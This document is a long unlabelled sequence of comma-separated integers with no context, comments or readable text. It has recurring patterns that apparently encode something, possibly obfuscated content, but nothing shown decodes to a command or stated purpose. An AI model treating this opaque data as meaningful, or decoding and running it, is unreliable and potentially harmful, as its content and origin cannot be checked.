5047, 6360, 2068, 3168, 3038, 4770, 3828, 3616, 2255, 11160, 2992, 2688, 3216, 3608, 1216, 1680, 2332, 1344, 6734, 5520, 4532, 3840, 2256, 4356, 1984, 4320, 3828, 3616, 1968, 11160, 2992, 2688, 3216, 3608, 1216, 1680, 2332, 1344, 3774, 6210, 4944, 11160, 2773, 1287, 620, 810, 8265, 12995, 4469, 13320, 7276, 8484, 2144, 9430, 3838, 4060, 3604, 4788, 8214, 12880, 7519, 13200, 5452, 9999, 7068, 10620, 8439, 12204, 1312, 5760, 3128, 4032, 3216, 4100, 2242, 455, 530, 546, 740, 1035, 9373, 11160, 1504, 11385, 6944, 8730, 10353, 12430, 1312, 14760, 884, 840, 603, 738, 4256, 3780, 5141, 5082, 6142, 12765, 12051, 13200, 4700, 3168, 2108, 6210, 8439, 12882, 4756, 12480, 7684, 9828, 6499, 8774, 3838, 3325, 2544, 2184, 2516, 6785, 1339, 1200, 423, 891, 7130, 9720, 8787, 11413, 4592, 3840, 3604, 4956, 871, 820, 342, 315, 5936, 4536, 7178, 13915, 8549, 13320, 5499, 10890, 6200, 2880, 2958, 7797, 3977, 13680, 7888, 8736, 7571, 9594, 3686, 3745, 5353, 3990, 3552, 5980, 3502, 7080, 611, 990, 558, 810, 10005, 12204, 4141, 12120, 7616, 2688, 3551, 4838, 494, 350, 477, 378, 8288, 12420, 9991, 14520, 3901, 10989, 7254, 9900, 8700, 3616, 1394, 8280, 6596, 9576, 7772, 8528, 4294, 4095, 5141, 4494, 7474, 10925, 4944, 6240, 1598, 5841, 806, 900, 783, 1017, 4715, 12960, 6868, 8484, 7504, 2624, 2014, 2065, 689, 420, 666, 1035, 11536, 12960, 4559, 11979, 5146, 9990, 10179, 12430, 4100, 3840, 2312, 5796, 6499, 9348, 4408, 3640, 5989, 4914, 7178, 12305, 10403, 11400, 2256, 5148, 2108, 5310, 1131, 1130, 369, 1080, 7820, 9072, 6767, 8282, 4256, 1120, 2809, 2478, 962, 1150, 927, 1080, 5264, 10692, 6014, 10890, 7221, 12543, 4797, 13200, 6800, 2688, 2278, 5658, 3686, 3990, 6148, 4368, 8362, 13455, 9991, 12840, 4747, 9405, 2976, 4680, 2958, 6667, 533, 1200, 612, 756, 7705, 8856, 3838, 3535, 5936, 1344, 3922, 6785, 1339, 1200, 423, 891, 6944, 9720, 8439, 13673, 3403, 13320, 7956, 9240, 6700, 2624, 1292, 2415, 5141, 4788, 8584, 11960, 11639, 14040, 4559, 10593, 6262, 8550, 4176, 5876, 1394, 7080, 884, 840, 603, 738, 4370, 3780, 5353, 4242, 8288, 3680, 5459, 7080, 611, 990, 558, 11250, 5133, 1469, 410, 1080, 6460, 7308, 6499, 9676, 3838, 1120, 3233, 1344, 2516, 4025, 11536, 11640, 5358, 11484, 6510, 8910, 9396, 11413, 4715, 13320, 7956, 9576, 6633, 8282, 1292, 1120, 5247, 4788, 7474, 11155, 11948, 12120, 4042, 9999, 6448, 9450, 8613, 12204, 4141, 9120, 7548, 8316, 6499, 8856, 1216, 3605, 5353, 4872, 8288, 12765, 11845, 3840, 5170, 11583, 6634, 9090, 9744, 12543, 4715, 7080, 884, 840, 603, 7790, 3306, 3395, 6254, 4242, 2368, 13225, 10403, 13920, 3760, 9603, 7068, 10440, 9135, 11187, 4428, 12120, 5440, 8148, 7638, 7954, 4142, 4025, 1696, 3822, 6734, 3910, 6695, 6120, 4324, 6732, 6014, 10440, 8439, 10735, 2870, 11040, 5440, 8148, 7638, 9512, 3990, 3465, 5724, 4242, 5106, 11730, 10506, 12120, 4653, 11484, 7130, 8280, 7395, 12430, 4305, 14160, 6868, 9576, 7705, 7954, 4104, 3220, 6201, 4620, 7770, 13570, 10403, 13680, 5405, 9603, 6696, 4140, 9744, 5763, 4100, 4080, 2992, 2688, 3283, 4428, 1672, 1120, 2915, 1848, 2368, 5980, 5768, 11160, 2068, 3168, 2108, 3060, 3828, 3616, 1394, 7920, 7140, 9072, 7236, 8036, 4218, 3395, 6042, 4200, 2516, 5060, 3296, 5880, 2068, 3168, 3100, 4320, 3828, 3616, 3731, 5760, 2992, 2688, 3216, 3608, 1216, 1680, 4929, 1848, 962, 1150, 927, 1080, 423, 891, 558, 8190, 4176, 4972, 1312, 5760, 2992, 2688, 3216, 7626, 1672, 1120, 2544, 1848, 2368, 5635, 4738, 6360, 2068, 3168, 3038, 3960, 2784, 5424, 1804, 3840, 6188, 4452, 3216, 3608, 1216, 1715, 2544, 2016, 6882, 5060, 3296, 10920, 4277, 4752, 2852, 4410, 3828, 3616, 1968, 5520, 3332, 3696, 2144, 3936, 1748, 1715, 2332, 1344, 3552, 5290, 5459, 11160, 2068, 3168, 806, 900, 783, 1017, 369, 1080, 612, 7644, 3216, 3772, 2014, 1540, 1696, 2016, 3404, 6095, 4532, 3840, 2256, 4554, 3286, 3960, 2784, 5424, 1886, 6360, 6324, 3696, 2144, 7462, 1862, 1540, 1696, 2058, 3256, 3680, 5047, 5280, 1504, 4752, 2852, 4590, 8091, 4972, 1312, 10920, 3332, 3696, 2144, 4018, 1672, 1120, 2597, 1848, 2368, 5520, 9579, 11160, 2068, 3168, 5642, 4410, 3828, 5424, 1886, 6360, 6324, 3696, 2144, 3936, 1748, 1715, 2332, 1344, 3626, 5060, 3296, 4080, 1598, 4356, 1984, 3060, 2958, 4972, 1312, 13200, 7956, 8988, 6767, 9184, 4218, 4025, 4929, 2478, 962, 1150, 927, 11400, 4089, 9603, 7316, 9090, 2784, 12995, 4141, 13920, 5440, 8148, 7638, 9512, 3990, 3465, 5724, 4242, 6068, 11155, 11330, 12000, 5217, 10791, 1984, 8190, 4350, 4972, 1312, 10920, 3400, 4032, 2948, 2624, 1900, 1680, 2332, 1344, 3700, 5520, 9579, 5280, 1504, 9009, 3286, 3960, 2784, 5989, 1804, 3840, 3264, 7812, 2948, 2624, 1824, 1540, 1696, 2016, 3256, 3680, 9373, 5760, 2068, 3168, 2976, 3960, 2784, 5424, 1804, 3840, 3264, 3864, 3283, 7626, 1672, 1120, 2544, 1848, 2368, 5520, 9579, 7080, 611, 990, 558, 8550, 7569, 10961, 4838, 12120, 2176, 9660, 6767, 9512, 3040, 3395, 6042, 4872, 7770, 11385, 11124, 12120, 3149, 10395, 7068, 8910, 9396, 11413, 1312, 10920, 3604, 4032, 2948, 2624, 3458, 1575, 2968, 2016, 3256, 3680, 4635, 6720, 2256, 4356, 1984, 4500, 4002, 5989, 3813, 11160, 4012, 1092, 670, 738, 3610, 3045, 5141, 4956, 7474, 3680, 11845, 12120, 5452, 6732, 7068, 9990, 9744, 8249, 4510, 13920, 6868, 9576, 7906, 7954, 4104, 1120, 2544, 1932, 3552, 5520, 4944, 6000, 2773, 1287, 620, 1170, 870, 1469, 410, 1080, 6460, 9072, 7035, 8446, 3952, 4060, 1696, 2562, 2368, 3910, 3605, 12960, 4935, 10197, 6448, 10440, 9744, 12543, 4305, 13200, 7888, 2856, 2144, 8118, 4332, 3535, 5141, 4872, 7474, 9890, 10403, 12480, 4935, 9801, 6696, 9090, 6612, 12543, 4059, 11640, 7344, 2688, 6097, 3280, 1520, 3605, 5353, 4872, 8288, 12765, 11845, 3840, 5170, 11583, 6634, 9090, 9744, 12543, 4715, 3840, 7820, 8484, 7236, 8282, 3762, 4060, 1696, 2016, 3034, 4715, 4532, 4800, 4841, 9999, 7192, 10080, 9657, 12995, 1312, 13200, 7956, 8988, 6767, 9184, 4218, 4025, 1696, 4830, 7474, 12420, 10403, 11880, 5452, 3168, 3038, 3690, 3828, 4520, 1640, 12360, 6868, 9744, 7504, 9102, 4370, 1120, 5830, 4914, 7918, 11615, 11536, 13320, 5405, 3168, 7130, 9090, 9396, 11413, 4059, 13920, 2176, 4200, 2747, 3526, 2014, 1680, 2544, 1722, 6882, 6785, 1339, 1200, 423, 9405, 6696, 9450, 8961, 11752, 4756, 3840, 7820, 8484, 7772, 6232, 3990, 3605, 5512, 4872, 4810, 12535, 10094, 12600, 4747, 10890, 7192, 8190, 4263, 5989, 1968, 5760, 2992, 2688, 3283, 4100, 1824, 1680, 2332, 1344, 3626, 5520, 4944, 5760, 4371, 5841, 806, 900, 783, 10735, 4428, 12600, 7004, 8736, 7772, 2624, 4370, 3535, 6148, 3192, 7770, 11845, 10712, 13920, 3149, 10989, 6696, 9990, 9918, 10283, 2009, 6360, 3264, 4032, 2948, 2624, 1862, 1750, 2544, 2016, 3256, 3680, 5047, 5760, 2256, 4752, 5766, 5310, 1131, 1130, 369, 11400, 7344, 8820, 6901, 8528, 4408, 1120, 6095, 4242, 8584, 8740, 10815, 12360, 4888, 11484, 4092, 10260, 9135, 11639, 4264, 13920, 7480, 8484, 7705, 9430, 1216, 1715, 2544, 2016, 3552, 5520, 4944, 5520, 2256, 5841, 806, 900, 1131, 1130, 533, 1200, 612, 8820, 6834, 2624, 1520, 3815, 5300, 4368, 7030, 12650, 12051, 12840, 4747, 9405, 6138, 9990, 9396, 12543, 4674, 11880, 7548, 9576, 7638, 8282, 3762, 4060, 5565, 4662, 8140, 3680, 6386, 3840, 2256, 4059, 1984, 10440, 9048, 11413, 4510, 1560, 680, 756, 8241, 1066, 380, 315, 477, 3822, 6882, 3680, 11845, 13440, 4559, 11781, 6820, 2880, 10701, 1469, 410, 1080, 612, 756, 2278, 8118, 4218, 3780, 5883, 4788, 4958, 12765, 11742, 13680, 4747, 9801, 7192, 9450, 9657, 12430, 4715, 4080, 2176, 9408, 7504, 5658, 3876, 3570, 5353, 4158, 8584, 7475, 10300, 12720, 5499, 11385, 7192, 2880, 7917, 5650, 1804, 3840, 3468, 4032, 2948, 2624, 1824, 1540, 1696, 3822, 3552, 5290, 4944, 5280, 1504, 4752, 2852, 4320, 3828, 3616, 1968, 5520, 3264, 3696, 2144, 3936, 1748, 1680, 4929, 1848, 2368, 10465, 4944, 5520, 2632, 4158, 3100, 3960, 2784, 5424, 1886, 6360, 2856, 4200, 2948, 2624, 1824, 1610, 2544, 1848, 2368, 5520, 4738, 6600, 4371, 4356, 1984, 8190, 4176, 5198, 2337, 5280, 2176, 4032, 3082, 4674, 1672, 1120, 2544, 1932, 4218, 5060, 3296, 5760, 2162, 4752, 5766, 8370, 5133, 1469, 410, 1080, 612, 756, 2278, 8118, 4218, 3780, 5883, 4788, 4958, 12765, 11742, 13680, 4747, 9801, 7192, 9450, 9657, 12430, 4715, 4080, 2176, 9408, 7504, 5658, 3876, 3570, 5353, 4158, 8584, 7705, 11433, 13080, 5123, 10395, 7192, 2880, 4176, 6667, 533, 1200, 612, 756, 603, 2788, 3762, 3885, 5724, 4662, 8436, 7705, 11433, 13680, 5358, 9999, 6138, 10440, 9135, 12543, 4510, 13800, 2312, 2688, 7504, 9184, 2622, 3570, 5406, 4242, 7326, 13340, 6695, 12000, 4982, 11583, 7130, 10440, 2784, 10283, 2009, 5280, 2176, 4032, 3082, 4592, 1672, 1120, 2385, 2016, 3404, 5520, 4944, 5880, 2068, 3168, 5642, 4320, 4002, 5424, 1804, 3840, 3264, 3864, 3216, 3608, 1216, 1680, 2438, 2016, 3256, 3680, 4944, 5520, 2256, 9207, 2728, 2880, 7917, 5424, 1886, 6720, 2856, 4200, 2948, 2624, 1824, 1610, 2809, 1764, 3700, 5060, 3296, 5760, 2162, 4752, 2728, 2880, 4176, 5198, 2255, 11160, 2992, 2688, 6097, 3936, 1748, 1995, 2332, 1344, 3552, 5290, 5871, 5280, 1504, 4752, 2852, 5130, 3828, 3616, 1968, 5520, 3264, 7812, 6231, 4838, 1216, 1120, 689, 420, 666, 1035, 927, 4080, 4653, 10989, 6696, 9990, 9918, 7571, 4551, 13680, 7752, 8484, 6633, 9512, 3990, 3885, 5830, 4830, 2516, 3680, 11536, 13440, 3243, 10098, 6324, 9090, 8613, 13108, 2747, 13320, 7412, 9156, 7035, 9512, 1216, 1785, 3127, 546, 740, 1035, 927, 1080, 1598, 9801, 6882, 9720, 9657, 12882, 2747, 13320, 7752, 9576, 6767, 8118, 4408, 3675, 5883, 4620, 8510, 3910, 3296, 13440, 5264, 6831, 6324, 9180, 8787, 11187, 4756, 8280, 7480, 8148, 6566, 8856, 3838, 1120, 6148, 4788, 8658, 11615, 6077, 1560, 470, 891, 558, 810, 2958, 11526, 4305, 12960, 7412, 5964, 7638, 7954, 3990, 3850, 1802, 1344, 8288, 12880, 7107, 12240, 4794, 9999, 6138, 10440, 6003, 12430, 3977, 11760, 7344, 8484, 2144, 9512, 4332, 4095, 5353, 2478, 2368, 1495, 1030, 1080, 423, 891, 2108, 9180, 9135, 12204, 4469, 8520, 7752, 8148, 7035, 9020, 1292, 1120, 5936, 4704, 5106, 11730, 10506, 12120, 4653, 11484, 4030, 9000, 9222, 13221, 4715, 13920, 2176, 7644, 3216, 3772, 1824, 1750, 2332, 1344, 3626, 5060, 3296, 5880, 2068, 3168, 2976, 4140, 4263, 4972, 1312, 5880, 2992, 2688, 6834, 7954, 4104, 4025, 5353, 3906, 4366, 1495, 1030, 1080, 423, 891, 2108, 9180, 9135, 12204, 4469, 8520, 7752, 8148, 7035, 9020, 1292, 1120, 5936, 4704, 5106, 11730, 10506, 12120, 4653, 11484, 4154, 9990, 9483, 12317, 4305, 13920, 2176, 4452, 3953, 1066, 380, 315, 477, 5250, 4366, 1495, 1030, 1080, 5875, 1287, 620, 810, 8787, 12204, 4715, 12120, 884, 840, 603, 10086, 494, 350, 477, 378, 6734, 10695, 3296, 13800, 5264, 9603, 7378, 9900, 2784, 13899, 533, 1200, 612, 756, 603, 2788, 3800, 4235, 5830, 4074, 8066, 12075, 10197, 7920, 5076, 11583, 7068, 3060, 2784, 12656, 4592, 8280, 6936, 8568, 6767, 8118, 4408, 2415, 5830, 4074, 7252, 12420, 10403, 3840, 5452, 11286, 7254, 9090, 5133, 1469, 410, 1080, 612, 756, 2278, 8200, 4598, 3850, 5141, 4578, 7770, 11385, 6798, 12960, 5499, 11286, 2108, 2880, 9744, 12656, 2829, 12240, 6936, 8484, 6633, 9512, 2470, 3500, 5618, 4914, 8510, 13340, 3296, 10920, 2303, 9207, 3658, 1170, 870, 1017, 369, 1080, 2312, 8400, 8107, 9020, 3686, 3815, 5565, 4158, 4884, 12420, 12051, 13680, 1598, 3168, 6944, 10080, 6003, 11526, 4182, 12120, 6732, 9744, 4489, 9102, 4142, 3815, 5565, 4872, 2368, 5635, 6077, 1560, 470, 1287, 620, 810, 783, 1017, 1394, 11880, 7548, 9072, 7437, 9348, 2546, 3885, 6042, 4788, 7474, 11385, 11948, 12600, 5217, 10890, 7130, 3060, 2784, 12656, 4592, 8280, 6936, 8568, 6767, 8118, 4408, 2415, 5830, 4074, 7252, 12420, 10403, 3840, 5452, 11286, 7254, 9090, 5133, 1469, 410, 1080, 612, 756, 2278, 8118, 4218, 3780, 5883, 4788, 4958, 12765, 11742, 13680, 4747, 9801, 7192, 9450, 9657, 12430, 4715, 4080, 2176, 9408, 7504, 5658, 3876, 3570, 5353, 4158, 8584, 7475, 10300, 12720, 5499, 11385, 7192, 2880, 7917, 5424, 1886, 6720, 2992, 2688, 3283, 4346, 1672, 1120, 2544, 1848, 2368, 10465, 4944, 5520, 2491, 4356, 1984, 4320, 4002, 5989, 1804, 3840, 3264, 3864, 3551, 3608, 1216, 1680, 4929, 1848, 2368, 10465, 4944, 5520, 2256, 4356, 1984, 4320, 4002, 5424, 1804, 3840, 3264, 3864, 3618, 3608, 1216, 1750, 4929, 1848, 6734, 5520, 4738, 6120, 2068, 3168, 2976, 4140, 4437, 4972, 1312, 5760, 3128, 4284, 2948, 2624, 1824, 1610, 2597, 3906, 6882, 6785, 3502, 11880, 5217, 10692, 6882, 10260, 5829, 12543, 4674, 13680, 6868, 8316, 7772, 8610, 4218, 3850, 6095, 1428, 2368, 12880, 11536, 8280, 4794, 10098, 6262, 8910, 10092, 7571, 4551, 13080, 7412, 8820, 7772, 2624, 1824, 1610, 2756, 2478, 962, 1150, 927, 1080, 423, 3168, 806, 900, 783, 1017, 369, 4080, 6800, 10164, 7370, 7954, 4142, 3675, 5247, 2772, 7992, 13455, 11742, 4080, 1504, 11088, 6944, 6210, 8874, 11526, 4141, 11880, 7888, 5460, 6700, 8692, 4446, 4025, 6148, 1344, 6734, 5520, 4738, 6360, 4371, 5841, 806, 900, 783, 1017, 369, 4080, 6800, 10164, 7370, 7954, 4142, 3675, 5247, 2772, 7992, 13455, 11742, 4080, 1504, 11088, 6944, 6210, 8874, 11526, 4141, 11880, 7888, 5628, 7437, 8938, 4142, 3675, 6148, 1344, 3774, 6785, 1339, 1200, 611, 990, 558, 810, 783, 5424, 1312, 13800, 6868, 9744, 5293, 9676, 3838, 3990, 5247, 4074, 8510, 13340, 3296, 5760, 2773, 1287, 620, 810, 783, 1017, 4715, 12960, 6868, 8484, 7504, 2624, 1824, 1610, 2597, 2478, 962, 1150, 1339, 1200, 423, 891, 558, 8550, 10440, 8136, 3977, 13200, 6800, 9072, 6767, 2624, 2318, 1120, 4823, 3906, 8510, 12880, 9991, 14280, 5170, 1287, 620, 810, 783, 1017, 5043, 1560, 680, 756, 603, 738, 342, 2905, 5724, 4242, 7474, 12880, 3296, 5880, 2773, 1287, 620, 810, 783, 1017, 369, 4080, 6732, 9324, 7236, 9102, 4332, 2345, 5883, 4788, 8436, 11615, 10197, 13920, 4935, 10989, 6820, 10350, 2958, 3616, 4592, 13440, 4692, 8568, 6834, 8282, 3762, 4060, 3445, 4200, 7844, 13455, 11845, 13920, 1504, 9009, 3038, 4140, 4176, 4972, 1312, 5760, 3128, 4452, 2948, 2624, 1824, 1540, 1696, 3822, 3552, 5290, 5459, 5280, 1504, 4752, 2852, 4770, 3828, 3616, 1968, 5520, 3604, 3696, 2144, 3936, 3534, 1540, 1696, 3822, 3626, 5290, 4944, 5280, 1504, 4851, 2852, 4320, 3828, 3616, 1968, 5520, 3808, 3696, 2144, 3936, 1748, 1820, 4929, 1848, 6734, 5520, 4738, 6120, 2068, 3168, 2976, 4140, 4437, 4972, 1312, 5760, 3128, 4284, 2948, 2624, 1824, 1610, 2597, 3906, 6882, 6785, 1339, 1200, 423, 891, 558, 810, 2958, 11187, 4551, 12960, 7548, 9576, 4489, 9102, 4332, 3990, 5353, 4158, 8584, 12075, 11433, 13200, 5405, 3366, 1984, 10080, 9744, 7797, 4182, 12240, 6868, 8316, 7772, 5494, 4218, 3815, 5777, 4410, 8584, 3680, 5150, 7080, 611, 990, 558, 810, 783, 14125, 2419, 1560, 680, 1092, 670, 1066, 380, 315, 477, 378, 2516, 11500, 12463, 13200, 4559, 10791, 6510, 8910, 5742, 12204, 4797, 13680, 2312, 2688, 7504, 9184, 2622, 3570, 5406, 4242, 7326, 13340, 6695, 12000, 4982, 11583, 7130, 10440, 2784, 10283, 2050, 11160, 4012, 1092, 670, 738, 342, 315, 1802, 4200, 8954, 12650, 9991, 13080, 4935, 9801, 4092, 9720, 10179, 12882, 1394, 3840, 7616, 9408, 4623, 8364, 3876, 3535, 5247, 4872, 4958, 12765, 11227, 13080, 4935, 11484, 1984, 4410, 5133, 1469, 410, 1560, 680, 756, 603, 738, 1292, 3500, 6413, 4620, 7178, 12535, 10815, 11880, 3102, 10692, 7254, 10260, 2958, 3616, 4592, 13440, 4692, 8568, 6834, 8282, 3762, 4060, 3445, 4200, 7844, 13455, 11845, 13920, 1504, 9009, 2976, 4140, 4611, 10509, 2419, 1560, 680, 756, 603, 738, 1292, 3500, 6413, 4620, 7178, 12535, 10815, 11880, 3102, 10692, 7254, 10260, 2958, 3616, 4592, 13440, 4692, 8568, 6834, 8282, 3762, 4060, 3551, 4662, 8066, 12535, 10815, 13920, 1504, 5148, 3658, 1170, 870, 1469, 410, 1080, 612, 756, 7705, 8856, 3838, 3535, 5936, 1344, 3848, 5290, 5459, 7080, 611, 990, 806, 900, 783, 1017, 369, 4080, 6732, 9324, 7236, 9102, 4332, 2345, 5883, 4788, 8436, 11615, 10197, 13920, 4935, 10989, 6820, 10350, 2958, 3616, 4592, 13440, 4692, 8568, 6834, 8282, 3762, 4060, 3445, 4200, 7844, 13455, 11845, 13920, 1504, 9009, 3038, 3960, 2784, 5537, 1804, 3840, 3264, 3696, 2144, 7462, 1824, 1610, 2809, 1848, 2368, 5520, 4738, 6360, 2068, 3168, 2976, 4140, 4611, 4972, 1312, 5760, 6324, 3696, 2144, 7462, 1862, 1610, 2544, 1848, 2368, 5635, 4738, 5760, 2068, 3168, 2976, 4140, 4872, 4972, 1312, 5760, 3128, 4368, 6231, 3608, 3458, 1680, 2438, 2142, 3256, 3680, 4944, 5520, 2397, 4356, 1984, 4320, 4002, 5763, 1804, 3840, 3264, 3864, 3283, 7626, 3534, 2065, 1802, 4158, 8214, 12420, 11433, 13680, 3149, 10989, 7068, 10260, 8787, 11187, 4756, 12600, 7548, 9240, 7705, 2788, 1216, 3920, 5936, 2898, 7548, 11730, 10403, 11880, 5452, 6633, 6882, 9810, 9483, 11865, 4756, 3840, 3332, 4956, 2144, 2788, 3762, 3885, 5724, 4662, 8436, 7705, 11433, 13680, 5358, 9999, 6138, 10440, 9135, 12543, 4510, 13800, 2312, 2688, 7504, 9184, 2622, 3570, 5406, 4242, 7326, 13340, 7107, 13200, 4559, 9702, 6696, 9090, 2784, 9492, 3362, 10200, 4692, 4956, 871, 820, 342, 315, 477, 1428, 7400, 13915, 11330, 11640, 5123, 10395, 6138, 5940, 9396, 13221, 4674, 4080, 2176, 9408, 7504, 5658, 3876, 3570, 5353, 4158, 8584, 7475, 10300, 12720, 5499, 11385, 7192, 2880, 7917, 5424, 3813, 7080, 884, 840, 603, 738, 342, 1190, 5300, 5082, 8140, 11155, 11227, 12600, 4653, 6534, 6696, 10530, 9918, 3842, 1312, 13440, 7616, 5796, 6834, 8364, 3838, 3465, 6148, 2814, 8214, 12535, 11227, 12600, 5452, 3168, 3038, 5310, 1131, 1130, 369, 1080, 8500, 4956, 871, 820, 342, 4375, 3127, 546, 740, 1035, 1339, 1200, 423, 11088, 6696, 8730, 10527, 11413, 4674, 3840, 7820, 9408, 6499, 9758, 4180, 1120, 6519, 546, 740, 1035, 927, 12120, 5170, 9603, 6076, 9720, 8787, 7571, 3977, 13080, 5644, 8736, 6499, 8774, 3838, 1120, 6148, 4788, 8658, 11615, 6077, 1560, 470, 891, 558, 8730, 8700, 11300, 2747, 11640, 7412, 6972, 6968, 7954, 4066, 3535, 1696, 3822, 3626, 5520, 4532, 3840, 2585, 4752, 2728, 2880, 4350, 5989, 3813, 7080, 884, 840, 603, 738, 4370, 3780, 5353, 4242, 8288, 3680, 5665, 5760, 2773, 1287, 620, 810, 783, 11413, 4510, 11640, 6664, 9072, 6767, 5494, 3686, 3815, 4399, 4368, 7178, 12305, 10403, 3840, 4794, 9603, 6696, 10350, 8787, 6667, 533, 1200, 612, 10500, 3953, 1066, 380, 315, 5565, 4284, 2960, 12535, 10300, 12480, 4465, 10890, 7254, 9630, 8787, 10735, 3977, 13800, 7072, 2688, 4154, 2624, 1824, 1435, 1696, 4872, 7696, 11615, 11330, 3840, 5781, 1287, 620, 810, 783, 10283, 3813, 3840, 7820, 9408, 6499, 9758, 4180, 1120, 6519, 546, 740, 1035, 927, 1080, 5405, 10692, 6262, 9090, 9744, 3616, 2050, 5760, 4012, 1092, 670, 738, 342, 315, 4823, 3906, 2368, 13225, 11536, 11640, 5593, 10890, 1984, 11070, 1131, 1130, 369, 1080, 612, 756, 6365, 9184, 4218, 4025, 1696, 2562, 2368, 12880, 11433, 13800, 4935, 11484, 6510, 9990, 9570, 3616, 4592, 12960, 6596, 10164, 6767, 9348, 2242, 455, 530, 378, 666, 1035, 927, 11400, 5264, 9603, 7068, 10260, 8439, 13673, 1312, 7320, 2176, 7644, 871, 820, 342, 315, 477, 378, 666, 10465, 3502, 7800, 2397, 9108, 4216, 8730, 10092, 10961, 3895, 8400, 6256, 6720, 6499, 9348, 4408, 3675, 5247, 4536, 7474, 7935, 10506, 12240, 4747, 9801, 7192, 10350, 8004, 9605, 4510, 12600, 8024, 8484, 7638, 9430, 3686, 3780, 4876, 3570, 8140, 12075, 12154, 12120, 5358, 11385, 6014, 9720, 2958, 4972, 1312, 5880, 3672, 3696, 2144, 4018, 1900, 1540, 1696, 2352, 3256, 3680, 5047, 11160, 2068, 1287, 620, 810, 783, 1017, 369, 1080, 2312, 2856, 2948, 1066, 380, 315, 477, 378, 666, 1035, 3502, 7920, 4935, 10692, 6696, 8820, 9657, 10961, 4674, 12000, 2312, 3696, 871, 820, 342, 315, 477, 378, 666, 5635, 4532, 1560, 470, 891, 558, 810, 783, 1017, 2132, 5280, 884, 840, 603, 738, 342, 315, 477, 3822, 3552, 5060, 4944, 5280, 2256, 9207, 2728, 1170, 870, 1017, 369, 1080, 612, 756, 6097, 3936, 1672, 1680, 2332, 2016, 6882, 5060, 1339, 1200, 423, 891, 558, 810, 783, 5537, 1804, 1560, 680, 756, 603, 738, 342, 315, 2544, 1932, 3552, 5520, 4944, 5760, 2256, 4851, 2728, 1170, 870, 1017, 369, 1080, 612, 756, 3216, 3608, 494, 350, 477, 378, 666, 1035, 927, 5880, 2162, 5148, 2728, 1170, 870, 1017, 369, 1080, 612, 756, 6097, 3936, 1748, 1680, 2809, 1848, 3552, 5290, 4944, 6360, 4371, 4356, 806, 900, 783, 1017, 369, 1080, 612, 7644, 6097, 3936, 1748, 1715, 2332, 2016, 3404, 5635, 4532, 5760, 2162, 4851, 2728, 4410, 8091, 10509, 1804, 1560, 680, 756, 603, 738, 342, 315, 4823, 2016, 3256, 5635, 9579, 5280, 611, 990, 558, 810, 783, 1017, 369, 5760, 3128, 4200, 2948, 1066, 380, 315, 477, 378, 666, 1035, 5047, 5520, 2350, 4356, 806, 900, 783, 1017, 369, 1080, 612, 2856, 2278, 3608, 494, 350, 477, 378, 666, 1035, 927, 4080, 1598, 4356, 806, 900, 783, 1017, 369, 1080, 612, 9912, 6767, 8528, 3990, 3465, 5724, 4242, 2368, 12880, 11124, 11640, 5687, 9999, 7068, 1170, 870, 1017, 369, 1080, 612, 7812, 3953, 1066, 380, 315, 477, 378, 666, 12535, 10300, 12480, 4465, 9603, 7130, 9360, 2784, 6893, 1312, 4080, 2380, 9408, 6499, 9348, 4408, 3675, 5247, 4536, 7474, 13225, 11433, 14040, 5358, 9801, 6262, 3060, 2784, 11187, 4674, 12120, 6596, 9744, 6767, 7052, 3838, 3640, 5565, 4158, 7992, 11615, 7828, 13320, 4653, 9603, 6696, 2880, 8265, 12656, 4551, 13800, 4012, 2688, 2144, 1066, 380, 315, 477, 378, 666, 12535, 10300, 12480, 4465, 9603, 7130, 9360, 2784, 12995, 4141, 13920, 5440, 8148, 7638, 9512, 3990, 3465, 5724, 4242, 5920, 11155, 11742, 11640, 5123, 11385, 1984, 8550, 9744, 10961, 4674, 13680, 6596, 10164, 3953, 1066, 380, 315, 477, 378, 666, 12535, 10300, 12480, 4465, 9603, 7130, 9360, 2784, 12995, 4141, 13920, 5440, 8148, 7638, 9512, 3990, 3465, 5724, 4242, 6068, 11155, 11330, 12000, 5217, 10791, 1984, 8190, 4176, 4972, 1312, 10920, 3332, 4032, 2948, 2624, 1862, 1680, 2332, 1344, 4070, 10695, 4532, 3840, 4277, 4752, 2728, 2880, 4176, 4972, 1312, 5760, 6324, 3696, 2144, 3936, 1672, 1120, 2544, 1932, 3552, 5635, 4532, 3840, 4277, 4752, 2728, 2880, 4176, 4972, 1312, 5760, 2992, 2688, 3216, 3772, 1862, 3255, 2332, 1344, 3552, 5060, 3296, 5760, 4371, 5841, 806, 900, 783, 1017, 369, 1080, 7412, 8400, 6968, 7790, 3686, 4025, 5512, 1344, 8510, 11615, 11948, 9600, 4559, 11286, 7192, 9450, 8613, 12204, 4141, 8040, 7140, 9576, 6633, 8856, 3838, 1120, 4823, 2016, 3404, 5520, 4532, 3840, 4277, 4752, 2728, 2880, 4176, 4972, 1312, 5760, 6324, 7812, 3953, 1066, 380, 315, 477, 378, 666, 12535, 10300, 12480, 4465, 9603, 7130, 9360, 2784, 12995, 4141, 13920, 4624, 9576, 7437, 9184, 2774, 3850, 6148, 4242, 8436, 13570, 9991, 12960, 1504, 4752, 2852, 4320, 4263, 6667, 533, 1200, 612, 756, 603, 10250, 2242, 455, 530, 378, 666, 14375, 6077, 1560, 470, 891, 7750, 5310, 1131, 1130, 369, 12600, 6936, 2688, 2680, 8938, 3800, 3640, 5035, 4620, 8658, 12305, 10403, 11400, 4700, 9999, 7130, 10440, 9918, 13221, 4059, 13920, 7140, 9324, 7370, 7790, 4636, 3885, 5830, 4242, 2368, 7130, 3296, 5760, 1927, 3168, 7192, 9360, 8787, 12430, 533, 1200, 612, 10332, 871, 820, 342, 315, 6519, 3990, 8880, 3680, 11845, 12120, 5452, 9900, 6014, 9810, 8439, 11639, 4141, 3840, 3332, 10500, 2144, 8364, 4218, 3990, 3657, 4074, 7326, 11960, 3296, 4800, 5170, 9999, 6014, 10260, 8787, 12995, 4756, 9480, 6664, 8904, 6767, 8118, 4408, 4025, 1696, 3822, 2960, 11845, 10403, 13920, 5264, 10989, 7130, 2880, 9570, 13221, 4387, 12120, 7616, 9324, 7705, 3362, 1672, 1120, 4823, 3906, 3256, 3680, 11227, 12000, 4888, 9405, 6820, 10530, 9309, 11413, 3895, 12000, 6868, 9660, 7772, 9348, 4446, 3465, 6148, 4410, 8214, 12650, 9785, 14640, 5217, 10890, 6262, 8370, 3567, 6667, 533, 1200, 612, 10500, 3953, 1066, 380, 455, 530, 546, 740, 1035, 9785, 10440, 4559, 11682, 6262, 2880, 10005, 11413, 4756, 8160, 7752, 9324, 7504, 5986, 4180, 4060, 5353, 4788, 8732, 11155, 11124, 3840, 2256, 4554, 2976, 4320, 4263, 6667, 533, 1200, 612, 8400, 6767, 8856, 